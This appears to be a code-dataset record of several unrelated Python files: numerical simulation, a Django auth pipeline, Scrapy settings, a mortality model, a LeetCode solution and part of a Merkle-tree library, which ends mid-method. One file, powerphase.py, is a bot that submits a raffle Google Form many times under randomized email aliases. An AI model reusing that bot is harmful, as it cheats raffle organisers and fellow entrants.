sweeper_params['num_nodes'] = [5]\n sweeper_params['QI'] = prec_type\n sweeper_params['initial_guess'] = 'spread'\n\n # initialize problem parameters\n problem_params = dict()\n problem_params['u0'] = 1.0 # initial value (for all instances)\n # use single values like this...\n # problem_params['lambdas'] = [[-1.0]]\n # .. or a list of values like this ...\n # problem_params['lambdas'] = [[-1.0, -2.0, 1j, -1j]]\n problem_params['lambdas'] = [[-1.0 + 0j]]\n # note: PFASST will do all of those at once, but without interaction (realized via diagonal matrix).\n # The propagation matrix will be diagonal too, corresponding to the respective lambda value.\n\n # initialize step parameters\n step_params = dict()\n step_params['maxiter'] = maxiter\n\n # initialize controller parameters\n controller_params = dict()\n controller_params['logger_level'] = 20\n controller_params['hook_class'] = error_output\n\n # fill description dictionary for easy step instantiation\n description = dict()\n description['problem_class'] = testequation0d # pass problem class\n description['problem_params'] = problem_params # pass problem parameters\n description['sweeper_class'] = generic_implicit # pass sweeper\n description['sweeper_params'] = sweeper_params # pass sweeper parameters\n description['level_params'] = level_params # pass level parameters\n description['step_params'] = step_params # pass step parameters\n\n return description, controller_params\n\n\ndef compare_preconditioners(f=None, list_of_k=None):\n\n # set time parameters\n t0 = 0.0\n Tend = 2.0\n\n for k in list_of_k:\n\n description_IE, controller_params_IE = testequation_setup(prec_type='MIN3', maxiter=k)\n description_LU, controller_params_LU = testequation_setup(prec_type='LU', maxiter=k)\n\n out = f'\\nWorking with maxiter = {k}'\n f.write(out + '\\n')\n print(out)\n\n # instantiate controller\n controller_IE = controller_nonMPI(\n num_procs=1, controller_params=controller_params_IE, description=description_IE\n )\n controller_LU = controller_nonMPI(\n num_procs=1, controller_params=controller_params_LU, description=description_LU\n )\n\n # get initial values on finest level\n P = controller_IE.MS[0].levels[0].prob\n uinit = P.u_exact(t0)\n uex = P.u_exact(Tend)\n\n # this is where the iteration is happening\n uend_IE, stats_IE = controller_IE.run(u0=uinit, t0=t0, Tend=Tend)\n uend_LU, stats_LU = controller_LU.run(u0=uinit, t0=t0, Tend=Tend)\n\n diff = abs(uend_IE - uend_LU)\n\n err_IE = abs(uend_IE - uex)\n err_LU = abs(uend_LU - uex)\n\n out = ' Error (IE/LU) vs. exact solution: %6.4e -- %6.4e' % (err_IE, err_LU)\n f.write(out + '\\n')\n print(out)\n out = ' Difference between both results: %6.4e' % diff\n f.write(out + '\\n')\n print(out)\n\n # convert filtered statistics to list\n errors_IE = get_sorted(stats_IE, type='error_after_step', sortby='time')\n errors_LU = get_sorted(stats_LU, type='error_after_step', sortby='time')\n print(errors_IE)\n print(errors_LU)\n\n\ndef main():\n\n f = open('comparison_IE_vs_LU.txt', 'w')\n compare_preconditioners(f=f, list_of_k=[1])\n f.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pySDC/playgrounds/Gander/testequation.py","file_name":"testequation.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"409995555","text":"from .models import Contributors\n\n\ndef get_profile_picture(backend, user, response, details, *args, **kwargs):\n\turl = None\n\tprofile = Contributors.objects.get_or_create(user = user)[0]\n\tif backend.name == 'facebook':\n\t\tprofile.image = 'http://graph.facebook.com/{0}/picture'.format(response['id'])\n\telif backend.name == \"twitter\":\n\t\tif response['profile_image_url'] != '':\n\t\t\tif not response.get('default_profile_image'):\n\t\t\t\tavatar_url = response.get('profile_image_url_https')\n\t\t\t\tif avatar_url:\n\t\t\t\t\tavatar_url = avatar_url.replace('_normal.', '_bigger.')\n\t\t\t\t\tprofile.image = avatar_url\n\tprofile.save()","sub_path":"people/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430382141","text":"import requests as re \nfrom random import getrandbits\n\nlink = 'https://docs.google.com/forms/d/e/1FAIpQLSepeZK22LZgura_2wMZ2vNkv3mhjnmRAUpC_ex123lal1Fv-A/viewform?c=0&w=1'\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n\ndef main(limit):\n\tfor i in range(1, limit):\n\t\tpayload = {\n\t\t\t'entry.2111423237' : 'YOUR NAME', # ENTER YOUR FULL NAME HERE\n\t\t\t'entry.2648839' : 'YOUREMAIL+{}@gmail.com'.format(getrandbits(40)), # ENTER YOUR GMAIL WHERE IT SAYS YOUREMAIL. DO NOT EDIT THE REST OF IT\n\t\t\t'entry.1712332735' : 'Manhattan', # CHANGE MANHATTAN TO EITHER MANHATTAN, WOMEN'S OR MIAMI\n\t\t\t'entry.473600588' : '8', # CHANGE THE SIZE FROM 8-14. ONLY HALF SIZES ARE 8, 8.5, 9, 9.5, 10, 10.5, 11, AND 11.5\n\t\t\t'fvv' : '1', # DON'T CHANGE\n\t\t\t'draftResponse' : '[null,null,\"-8673160571613629000\"] ', # DON'T CHANGE\n\t\t\t'pageHistory' : '0', # DON'T CHANGE\n\t\t\t'fbzx' : '-8673160571613629000' # DON'T CHANGE\n\t\t}\n\n\t\tre.post(link, data=payload, headers=headers)\n\t\tprint('{}/{} registered.'.format(i, limit))\n\nif __name__ == \"__main__\":\n main(10) # HERE ENTER IN ANY NUMBER","sub_path":"powerphase.py","file_name":"powerphase.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525616345","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for dirbot project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'dirbot'\n\nSPIDER_MODULES = ['dirbot.spiders']\nNEWSPIDER_MODULE = 'dirbot.spiders'\nDEFAULT_ITEM_CLASS = 'dirbot.items.Website'\nITEM_PIPELINES = {'dirbot.pipelines.FilterWordsPipeline':1}\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'dirbot (+http://www.yourdomain.com)'\n","sub_path":"dirbot/dirbot/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161450972","text":"\"\"\"\nThis takes a set of observed mortality rates,\nand fits them to find the total mortality rate.\nIt sets up a Dismod-AT model that has only nonzero omega and treats\nthe mortality rate observations as mtother.\n\"\"\"\nimport itertools as it\nimport logging\nfrom timeit import default_timer as timer\n\nimport db_queries\nimport numpy as np\nimport pandas as pd\nfrom numpy import nan\n\nfrom cascade.model import (\n Model, Session, DismodGroups, Var, SmoothGrid,\n Uniform, Gaussian\n)\nfrom cascade.input_data.db.asdr import asdr_as_fit_input\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef construct_weights(initial_mtother_guess, locations, ages, times, location_id, step_size):\n \"\"\"A weight is a function of age and time that is the population of a state.\n For incidence, that state is susceptible. For excess mortality, that\n state is with-condition. It is the state individuals leave. For total\n mortality, it's susceptible plus with-condition.\n\n This function makes a rough estimate of the population size in order to use\n it as a weight on total mortality.\n \"\"\"\n susceptible_places = pd.DataFrame(dict(\n integrand=\"susceptible\",\n location=location_id,\n age_lower=np.tile(ages, len(times)),\n age_upper=np.tile(ages, len(times)),\n time_lower=np.repeat(times, len(ages)),\n time_upper=np.repeat(times, len(ages)),\n ))\n full_guess = DismodGroups()\n full_guess.rate[\"omega\"] = initial_mtother_guess\n session = Session(locations=locations, parent_location=location_id, filename=\"graduate.db\")\n session.set_option(ode_step_size=step_size)\n begin = timer()\n predicted, not_predicted = session.predict(full_guess, susceptible_places, location_id)\n LOGGER.info(f\"predict {timer() - begin}\")\n # XXX predicted_df is coming back with a sample_index of None. Fix that.\n print(f\"Smallest predicted susceptible {predicted['mean'].min()}\")\n # We are constructing a weight from the prediction, so it can't be zero.\n # How about 1 in 10,000 alive as the minimum?\n with_min = predicted.assign(floor_value=1e-4)\n the_two = with_min[[\"floor_value\", \"mean\"]]\n floored_susceptible = predicted.assign(mean=the_two.max(axis=1))\n weight = rectangular_data_to_var(floored_susceptible)\n # This assigns two of the four weights (constant, with_condition). Those missing\n # will be assigned constant values.\n return dict(total=weight, susceptible=weight)\n\n\ndef rectangular_data_to_var(gridded_data):\n \"\"\"Using this very regular data, where every age and time is present,\n construct an initial guess as a Var object. Very regular means that there\n is a complete set of ages-cross-times.\"\"\"\n initial_ages = np.sort(np.unique(0.5 * (gridded_data.age_lower + gridded_data.age_upper)))\n initial_times = np.sort(np.unique(0.5 * (gridded_data.time_lower + gridded_data.time_upper)))\n\n guess = Var(ages=initial_ages, times=initial_times)\n for age, time in guess.age_time():\n found = gridded_data.query(\n \"(age_lower <= @age) & (@age <= age_upper) & (time_lower <= @time) & (@time <= time_upper)\")\n assert len(found) == 1, f\"found {found}\"\n guess[age, time] = float(found.iloc[0][\"mean\"])\n return guess\n\n\ndef estimate_mortality_hazard(mtother, initial_mtother_guess, weights, params):\n # We will want to set the weight for \"total\".\n # The weight used for mtother is listed in cascade.dismod.constants.INTEGRAND_TO_WEIGHT\n ages = params[\"ages\"]\n times = params[\"times\"]\n model = Model(nonzero_rates=[\"omega\"], parent_location=params[\"location_id\"], child_location=[],\n covariates=None, weights=weights)\n omega_grid = SmoothGrid(ages=ages, times=times)\n omega_grid.value[:, :] = Uniform(lower=0, upper=1.5, mean=0.01)\n # omega_grid.value[:, :] = Gaussian(lower=0, upper=1.5, mean=0.01, standard_deviation=value_stdev)\n # XXX This for-loop sets the mean as the initial guess because the fit command\n # needs the initial var and scale var to be on the same age-time grid, and\n # this set is not. The session could switch it to the other age-time grid.\n for age, time in omega_grid.age_time():\n omega_grid.value[age, time] = omega_grid.value[age, time].assign(mean=initial_mtother_guess(age, time))\n\n omega_grid.dage[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dage_ratio\"] * params[\"value_stdev\"])\n omega_grid.dtime[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dtime_ratio\"] * params[\"value_stdev\"])\n model.rate[\"omega\"] = omega_grid\n\n # The data has some small stdevs. Let's give those a smallest value.\n smallest_stdev = mtother.assign(rtol=params[\"relative_min_std\"] * mtother[\"mean\"], atol=params[\"absolute_min_std\"])\n the_three = smallest_stdev[[\"rtol\", \"atol\", \"std\"]]\n less_stringent = mtother.assign(std=the_three.max(axis=1))\n\n # XXX Make session docs reflect exact data columns.\n session = Session(locations=params[\"locations\"], parent_location=params[\"location_id\"], filename=\"graduate.db\")\n session.set_option(**params[\"fit_option\"])\n begin = timer()\n fit_result = session.fit(model, less_stringent)\n LOGGER.info(f\"fit {timer() - begin} Success {fit_result.success}\")\n max_fit = fit_result.fit\n\n # How much different is the fit_result.fit_residual from the predicted value\n # using finer steps? It won't be very different. Under 10%.\n session.set_option(ode_step_size=params[\"ode_step_size_for_predict\"])\n # XXX make the session docs reflect exact columns and remove columns from\n # dataframe b/c that allows us to pass in data as avgints.\n avgint = mtother[[\"integrand\", \"location\", \"age_lower\", \"age_upper\", \"time_lower\", \"time_upper\"]]\n mt_fit, mt_not_fit = session.predict(max_fit, avgint, params[\"location_id\"])\n\n # XXX not handling the not_predicted case.\n draws = make_draws(model, less_stringent, max_fit, params[\"simulate_cnt\"], params)\n\n return max_fit, draws\n\n\ndef make_draws(model, less_stringent, max_fit, count, params):\n session = Session(locations=params[\"locations\"], parent_location=params[\"location_id\"], filename=\"simulate.db\")\n session.set_option(**params[\"fit_option\"])\n simulate_result = session.simulate(model, less_stringent, max_fit, count)\n\n draws = list()\n for draw_idx in range(simulate_result.count):\n sim_model, sim_data = simulate_result.simulation(draw_idx)\n # let's start a new session because the simulation results are associated\n # with a session and running a new fit will delete them.\n fit_file = f\"simulate{draw_idx}.db\"\n sim_session = Session(locations=locations, parent_location=location_id, filename=fit_file)\n sim_session.set_option(**params[\"fit_option\"])\n begin = timer()\n sim_fit_result = sim_session.fit(sim_model, sim_data)\n LOGGER.info(f\"fit {timer() - begin} success {sim_fit_result.success}\")\n if sim_fit_result.success:\n draws.append(sim_fit_result.fit)\n print(f\"sim fit {draw_idx} success\")\n else:\n print(f\"sim fit {draw_idx} not successful in {fit_file}.\")\n # XXX make the Session close or be a contextmanager.\n del sim_session\n return draws\n\n\ndef estimate_mortality_with_draws(mtother, draws, weights, params):\n # Given draws from a solution, let's set parameters on priors of a new model.\n # Don't assume that the model has the same ages and times, or that it has\n # the same distributions. Let the draws, as continuous functions, prime the\n # next priors.\n ages = params[\"ages\"]\n times = params[\"times\"]\n\n sub_model = Model(\n nonzero_rates=[\"omega\"], parent_location=params[\"location_id\"], child_location=[],\n covariates=None, weights=weights)\n omega_grid = SmoothGrid(ages=ages, times=times)\n omega_grid.value[:, :] = Gaussian(lower=0, upper=1.5, mean=0.01, standard_deviation=0.5)\n omega_grid.dage[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dage_ratio\"] * params[\"value_stdev\"])\n omega_grid.dtime[:, :] = Gaussian(mean=0.0, standard_deviation=params[\"dage_ratio\"] * params[\"value_stdev\"])\n sub_model.rate[\"omega\"] = omega_grid\n\n set_priors_from_draws(sub_model, draws)\n\n # The data has some small stdevs. Let's give those a smallest value.\n smallest_stdev = mtother.assign(rtol=params[\"relative_min_std\"] * mtother[\"mean\"], atol=params[\"absolute_min_std\"])\n the_three = smallest_stdev[[\"rtol\", \"atol\", \"std\"]]\n less_stringent = mtother.assign(std=the_three.max(axis=1))\n\n sub_session = Session(locations=locations, parent_location=location_id, filename=\"subsession.db\")\n sub_session.set_option(**params[\"fit_option\"])\n begin = timer()\n sub_fit = sub_session.fit(sub_model, less_stringent)\n LOGGER.info(f\"fit {timer() - begin} success {sub_fit.success}\")\n\n draws = make_draws(sub_model, less_stringent, sub_fit.fit, params[\"simulate_cnt\"], params)\n\n return sub_fit, draws\n\n\ndef set_priors_from_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *same model*.\"\"\"\n if len(draws) == 0:\n return\n\n for group_name, group in model.items():\n if group_name not in draws[0]:\n continue\n\n for key, prior_grid in group.items():\n if key not in draws[0][group_name]:\n continue\n\n ages = prior_grid.ages\n times = prior_grid.times\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(draws, group_name, key, ages, times)\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\ndef set_priors_from_parent_draws(model, draws):\n \"\"\"Sets priors from posteriors of the *parent model*.\"\"\"\n assert len(draws) > 0\n\n for group_name, group in model.items():\n if group_name not in draws[0] or group_name == \"random_effect\":\n continue\n\n for key, prior_grid in group.items():\n if key not in draws[0][group_name]:\n continue\n\n ages = prior_grid.ages\n times = prior_grid.times\n if group_name == \"rate\" and (key, model.location_id) in draws[0][\"random_effect\"]:\n draw_value, draw_dage, draw_dtime = gather_draws_for_child_grid(\n draws, group_name, key, ages, times, location_id)\n LOGGER.debug(f\"Child prior found for {group_name} {key}\")\n elif group_name != \"rate\":\n draw_value, draw_dage, draw_dtime = gather_draws_for_grid(draws, group_name, key, ages, times)\n LOGGER.debug(f\"Prior found for {group_name} {key}\")\n else:\n LOGGER.debug(f\"No prior found for {group_name} {key}\")\n continue\n\n estimate_grid_parameters(prior_grid.value, draw_value, ages, times)\n estimate_grid_parameters(prior_grid.dage, draw_dage, ages[:-1], times)\n estimate_grid_parameters(prior_grid.dtime, draw_dtime, ages, times[:-1])\n\n\ndef gather_draws_for_grid(draws, group_name, key, ages, times):\n # Gather data from incoming draws into an array of (draw, age, time)\n draw_data = np.zeros((len(draws), len(ages), len(times)))\n for didx in range(len(draws)):\n one_draw = draws[didx][group_name][key]\n for aidx, age in enumerate(ages):\n for tidx, time in enumerate(times):\n draw_data[didx, aidx, tidx] = one_draw(age, time)\n\n draw_data = draw_data.transpose([1, 2, 0])\n draw_dage = np.diff(draw_data, n=1, axis=0)\n draw_dtime = np.diff(draw_data, n=1, axis=1)\n return draw_data, draw_dage, draw_dtime\n\n\ndef gather_draws_for_child_grid(draws, group_name, key, ages, times, location_id):\n # Gather data from incoming draws into an array of (draw, age, time)\n draw_data = np.zeros((len(draws), len(ages), len(times)))\n for didx in range(len(draws)):\n underlying = draws[didx][group_name][key]\n random_effect = draws[didx][\"random_effect\"][(key, location_id)]\n for aidx, age in enumerate(ages):\n for tidx, time in enumerate(times):\n draw_data[didx, aidx, tidx] = underlying(age, time) * np.exp(random_effect(age, time))\n\n draw_data = draw_data.transpose([1, 2, 0])\n draw_dage = np.diff(draw_data, n=1, axis=0)\n draw_dtime = np.diff(draw_data, n=1, axis=1)\n return draw_data, draw_dage, draw_dtime\n\n\ndef estimate_grid_parameters(grid_priors, draws, ages, times):\n for aidx, tidx in it.product(range(len(ages)), range(len(times))):\n age = ages[aidx]\n time = times[tidx]\n grid_priors[age, time] = grid_priors[age, time].mle(draws[aidx, tidx, :])\n\n\n# %%\nlogging.root.setLevel(logging.INFO)\nlocation_id = 101 # Canadia\nsex_id = 1\ngbd_round_id = 5\ndecomp_step = \"step1\"\nage_group_set_id = 12\n\nages_df = db_queries.get_age_metadata(age_group_set_id=age_group_set_id, gbd_round_id=gbd_round_id)\n# This comes in yearly from 1950 to 2018\nmtother = asdr_as_fit_input(location_id, sex_id, gbd_round_id, decomp_step, ages_df, with_hiv=True)\n# Reduce years by factor because it's slow with too much data.\n# Maybe smarter to work with a dense set of years, so limit to 1990-2000?\nmtother = mtother[(mtother.time_lower % 10) < 0.1]\n\n\n# %%\n# Locations, ages, and times on which the model will be based.\nlocations = pd.DataFrame(dict(\n location_id=[location_id],\n parent_id=[nan],\n name=[\"country\"],\n))\nages = np.sort(np.unique(np.concatenate([mtother.age_lower, mtother.age_upper])))\ntimes = np.sort(np.unique(mtother.time_lower))\ntimes = np.concatenate([times, times[-1:] + 1])\nLOGGER.info(f\"age cnt {len(ages)} time cnt {times}\")\n# Let step size be smallest age group size. No harm because predict is fast.\n# If you forget to change this for the fit, memory will explode.\node_step_size_for_predict = min(np.diff(ages))\nprint(f\"ode step size for predict {ode_step_size_for_predict}\")\n\n# Fitting mortality rate depends on prevalence because mortality is an\n# integrand. The prevalence is what determines the weight to calculate the\n# integrand. This is circular. Here, we use mortality rate as a guess\n# at mortality, use that to predict an approximate prevalence. Then\n# we will pass that approximate prevalence into the fit as a weight.\n\ninitial_mtother_guess = rectangular_data_to_var(mtother)\n\nweights = construct_weights(initial_mtother_guess, locations, ages, times, location_id, ode_step_size_for_predict)\n\n# %%\n\n# These are parameters on the fit.\nparams = dict(\n ages=ages,\n times=times,\n locations=locations,\n location_id=location_id,\n value_stdev=1e-1, # stdev on the value parameter, if we use Gaussian\n dage_ratio=50, # stdev on dage is dage_ratio * value_stdev\n dtime_ratio=50, # stdev on dtime is dtime_ratio * value_stdev\n absolute_min_std=1e-4, # Change data std to be at least this large.\n relative_min_std=0.005, # and at least this fraction of the mean.\n fit_step_size=5,\n simulate_cnt=5,\n extra_ages=[0.019, 0.077, .15, .5, 1, 2],\n ode_step_size_for_predict=ode_step_size_for_predict,\n)\nparams[\"fit_option\"] = dict(\n random_seed=0,\n ode_step_size=params[\"fit_step_size\"],\n age_avg_split=\" \".join(str(ea) for ea in params[\"extra_ages\"]),\n # quasi_fixed=\"true\",\n derivative_test_fixed=\"none\",\n max_num_iter_fixed=100,\n print_level_fixed=5,\n tolerance_fixed=1e-8,\n)\nprint(f\"age avg split str {params['fit_option']['age_avg_split']}\")\n\n# %%\n\nmax_fit, draws = estimate_mortality_hazard(mtother, initial_mtother_guess, weights, params)\nsecond_fit, second_draws = estimate_mortality_with_draws(mtother, draws, weights, params)\n\n# %%\nthird_fit, third_draws = estimate_mortality_with_draws(mtother, second_draws, weights, params)\n","sub_path":"examples/graduate_mortality.py","file_name":"graduate_mortality.py","file_ext":"py","file_size_in_byte":15843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346700925","text":"from exchanges.factory import CreateExchangeService\n\nfrom exchanges.binance import BinanceService\nfrom pandas import DataFrame\n\n\nmessage = {\n 'action': 'CREATED',\n 'exchange': 'binance',\n 'symbol': 'UBT/ETH',\n 'exchange_order_id': '1',\n 'internal_order_id': '2',\n 'side': 'buy',\n 'quantity': '10',\n 'price': '100',\n 'cum_quantity_filled': '5',\n 'order_status': 'CREATED',\n 'server_ms': 1000,\n 'received_ms': 1000}\n\norder_book = DataFrame([{'side': 'ask', 'quantity': 20.0, 'price': 120.0, 'depth': 2, 'exchange': 'binance'},\n {'side': 'ask', 'quantity': 10.0, 'price': 110.0, 'depth': 1, 'exchange': 'binance'},\n {'side': 'bid', 'quantity': 12.0, 'price': 100.0, 'depth': 1, 'exchange': 'binance'},\n {'side': 'bid', 'quantity': 32.0, 'price': 90.0, 'depth': 2, 'exchange': 'binance'}])\n\n\ndef test_factory():\n idex = CreateExchangeService('idex', None, None, tick_tock=False)\n qryptos = CreateExchangeService('qryptos', None, None, tick_tock=False)\n binance = CreateExchangeService('binance', None, None)\n\n\nif __name__ == '__main__':\n test_factory()","sub_path":"exchanges/test/test_exchanges.py","file_name":"test_exchanges.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"776077","text":"\"\"\"\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and\nsell one share of the stock multiple times).\n\nhttps://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/528/week-1/3287/\n\"\"\"\n\n\nclass Solution:\n def get_next(self, iterable):\n iterator = iter(iterable)\n try:\n current = next(iterator)\n for next_item in iterator:\n yield current, next_item\n current = next_item\n except StopIteration as e:\n return e\n\n def maxProfit(self, prices: list) -> int:\n profit = 0\n for current, next_item in self.get_next(prices):\n if next_item > current:\n profit = profit + (next_item - current)\n return profit\n\n\nif __name__ == '__main__':\n sln = Solution()\n print(sln.maxProfit([7,1,5,3,6,4]))\n","sub_path":"buy_and_sell.py","file_name":"buy_and_sell.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433886170","text":"\"\"\"Provides the main class for Merkle-trees and related functionalites\n\"\"\"\n\nfrom .hashing import hash_machine\nfrom .utils import log_2, decompose, NONE\nfrom .nodes import Node, Leaf\nfrom .proof import Proof\nfrom .serializers import MerkleTreeSerializer\nfrom .exceptions import LeafConstructionError, NoChildException, EmptyTreeException, NoPathException, InvalidProofRequest, NoSubtreeException, NoPrincipalSubrootsException, InvalidTypesException, InvalidComparison, WrongJSONFormat, UndecodableRecordError, NotSupportedEncodingError, NotSupportedHashTypeError\nimport json\nfrom json import JSONDecodeError\nimport uuid\nimport os\nimport mmap\nimport contextlib\nfrom tqdm import tqdm\n\nNONE_BAR = '\\n ' + '\\u2514' + '\\u2500' + NONE # └─[None]\n\n\nclass MerkleTree(object):\n \"\"\"Class for Merkle-trees\n\n :param \\*records: [optional] The records initially stored by the Merkle-tree. If provided, the tree is constructed with\n as many leafs from the beginning, storing the hashes of the inserted records in the respective order.\n :type \\*records: str or bytes or bytearray\n :param hash_type: [optional] Defaults to ``'sha256'``. Should be included in ``hashing.HASH_TYPES`` (upper- or mixed-case\n with '-' instead of '_' allowed), otherwise an exception is thrown.\n :type hash_type: str\n :param encoding: [optional] Defaults to ``'utf_8'``. Should be included in ``hashing.ENCODINGS`` (upper- or mixed-case\n with '-' instead of '_' allowed), otherwise an exception is thrown.\n :type encoding: str\n :param security: [optional] Defaults to ``True``.If ``False``, defense against second-preimage attack will be disabled\n :type security: bool\n\n :raises UndecodableRecordError: if any of the provided ``records`` is a bytes-like object which cannot be decoded with\n the provided encoding type\n :raises NotSupportedHashTypeError: if ``hash_type`` is not contained in ``hashing.HASH_TYPES``\n :raises NotSupportedEncodingType : if ``encoding`` is not contained in ``hashing.ENCODINGS``\n\n :ivar uuid: (*str*) uuid of the Merkle-tree (time-based)\n :ivar hash_type: (*str*) See the constructor's homonymous argument\n :ivar encoding: (*str*) See the constructor's homonymous argument\n :ivar security: (*bool*) Iff ``True``, security measures against second-preimage attack are activated\n :ivar hash: (*method*) Core hash functionality of the Merkle-tree\n :ivar multi_hash: (*method*) Hash functionality used by the Merkle-tree for performing inclusion tests (explicitly or\n implicitly upon a request for consistency proof)\n \"\"\"\n\n def __init__(self, *records, hash_type='sha256', encoding='utf-8', security=True):\n\n self.uuid = str(uuid.uuid1())\n\n try:\n # Hash type, encoding type and security mode configuration\n\n machine = hash_machine(\n hash_type=hash_type,\n encoding=encoding,\n security=security\n )\n\n except (NotSupportedEncodingError, NotSupportedHashTypeError):\n raise\n\n self.hash_type = hash_type.lower().replace('-', '_')\n self.encoding = encoding.lower().replace('-', '_')\n self.security = security\n self.hash = machine.hash\n self.multi_hash = machine.multi_hash\n\n # Initialized here so that consistency-proof works in some edge cases\n\n self.leaves = []\n self.nodes = set()\n\n # Tree generation\n\n for record in records:\n\n try:\n self.update(record=record)\n\n except UndecodableRecordError:\n raise\n\n# --------------------------- Boolean implementation ---------------------\n\n def __bool__(self):\n \"\"\"\n :returns: ``False`` iff the Merkle-tree has no nodes\n :rtype: bool\n \"\"\"\n\n return bool(self.nodes)\n\n# ------------------------------------ Properties ------------------------\n\n @property\n def root(self):\n \"\"\"Returns the current root of the Merkle-tree\n\n :returns: the tree's current root\n :rtype: nodes._Node\n\n :raises EmptyTreeException: if the Merkle-tree is currently empty\n \"\"\"\n if not self:\n raise EmptyTreeException\n\n return self._root\n\n @property\n def rootHash(self):\n \"\"\"Returns the current root-hash of the Merkle-tree, i.e., the hash stored by its current root\n\n :returns: the tree's current root-hash\n :rtype: bytes\n\n :raises EmptyTreeException: if the Merkle-tree is currently empty\n \"\"\"\n try:\n _root = self.root\n except EmptyTreeException:\n raise\n\n return _root.digest\n\n @property\n def length(self):\n \"\"\"Returns the Merkle-tree's current length, i.e., the number of its leaves\n\n :rtype: int\n \"\"\"\n return len(self.leaves)\n\n @property\n def size(self):\n \"\"\"Returns the current number of the Merkle-tree's nodes\n\n :rtype: int\n \"\"\"\n return len(self.nodes)\n\n @property\n def height(self):\n \"\"\"Calculates and returns the Merkle-tree's current height\n\n .. note:: Since the tree is binary *balanced*, its height coincides with the length of its leftmost branch\n\n :rtype: int\n \"\"\"\n\n length = len(self.leaves)\n\n if length > 0:\n return log_2(length) + 1 if length != 2**log_2(length) else log_2(length)\n else:\n return 0\n\n# ---------------------------------- Updating ----------------------------\n\n def update(self, record=None, digest=None):\n \"\"\"Updates the Merkle-tree by storing the hash of the inserted record in a newly-created leaf, restructuring\n the tree appropriately and recalculating all necessary interior hashes\n\n :param record: [optional] The record whose hash is to be stored into a new leaf.\n :type record: str or bytes or bytearray\n :param digest: [optional] The hash to be stored by the new leaf (after encoding).\n :type digest: str\n\n .. warning:: Exactly *one* of *either* ``record`` *or* ``digest`` should be provided\n\n :raises LeafConstructionError: if both ``record`` and ``digest`` were provided\n :raises UndecodableRecordError: if the provided ``record`` is a bytes-like object which could not be decoded with\n the Merkle-tree's encoding type\n \"\"\"\n if self:\n\n # ~ Height and root of the *full* binary subtree with maximum\n # ~ possible length containing the rightmost leaf\n\n last_power = decompose(len(self.leaves))[-1]\n last_subroot = self.leaves[-1].descendant(degree=last_power)\n\n # Store new record to new leaf\n\n try:\n new_leaf = Leaf(\n hashfunc=self.hash,\n encoding=self.encoding,\n record=record,\n digest=digest\n )\n\n except (LeafConstructionError, UndecodableRecordError):\n raise\n\n # Assimilate new leaf\n\n self.leaves.append(new_leaf)\n self.nodes.add(new_leaf)\n\n try:\n # Save child info before bifurcation\n old_child = last_subroot.child\n\n except NoChildException: # last_subroot was previously root\n\n self._root = Node(\n hashfunc=self.hash,\n encoding=self.encoding,\n left=last_subroot,\n right=new_leaf\n )\n\n self.nodes.add(self._root)\n\n else:\n # Bifurcate\n\n # Create bifurcation node\n\n new_child = Node(\n hashfunc=self.hash,\n encoding=self.encoding,\n left=last_subroot,\n right=new_leaf\n )\n\n self.nodes.add(new_child)\n\n # Interject bifurcation node\n\n old_child.set_right(new_child)\n new_child.set_child(old_child)\n\n # Recalculate hashes only at the rightmost branch of the tree\n\n current_node = old_child\n\n while True:\n current_node.recalculate_hash(hashfunc=self.hash)\n\n try:\n current_node = current_node.child\n except NoChildException:\n break\n\n else: # Empty tree case\n\n try:\n new_leaf = Leaf(\n hashfunc=self.hash,\n encoding=self.encoding,\n record=record,\n digest=digest\n )\n\n except (LeafConstructionError, UndecodableRecordError):\n raise\n\n self.leaves = [new_leaf]\n self.nodes = set([new_leaf])\n self._root = new_leaf\n\n\n# ---------------------------- Audit-proof utilities ---------------------\n\n def audit_path(self, index):\n \"\"\"Computes and returns the main body for the audit-proof requested upon the provided index\n\n Body of an audit-proof consist of an *audit-path* (a sequence of signed hashes) and a *proof-index* (the position\n within the above sequence where a subsequent proof-validation should start from)\n\n :param index: index (zero based) of the leaf where the audit-path computation should be based upon\n :type index: int\n :returns: starting position for application of hashing along with the tuple of signed hashes (pairs of the form\n *(+1/-1, bytes)*, the sign ``+1`` or ``-1`` indicating pairing with the right resp. left neighbour)\n :rtype: (int, tuple<(+1/-1, bytes)>)\n\n :raises NoPathException: if the provided index is out of range (including the empty Merkle-tree case)\n \"\"\"\n\n if index < 0:\n # ~ Handle negative index case separately NoPathException, since certain\n # ~ negative indices might otherwise be considered as valid positions\n raise NoPathException\n else:\n\n try:\n current_node = 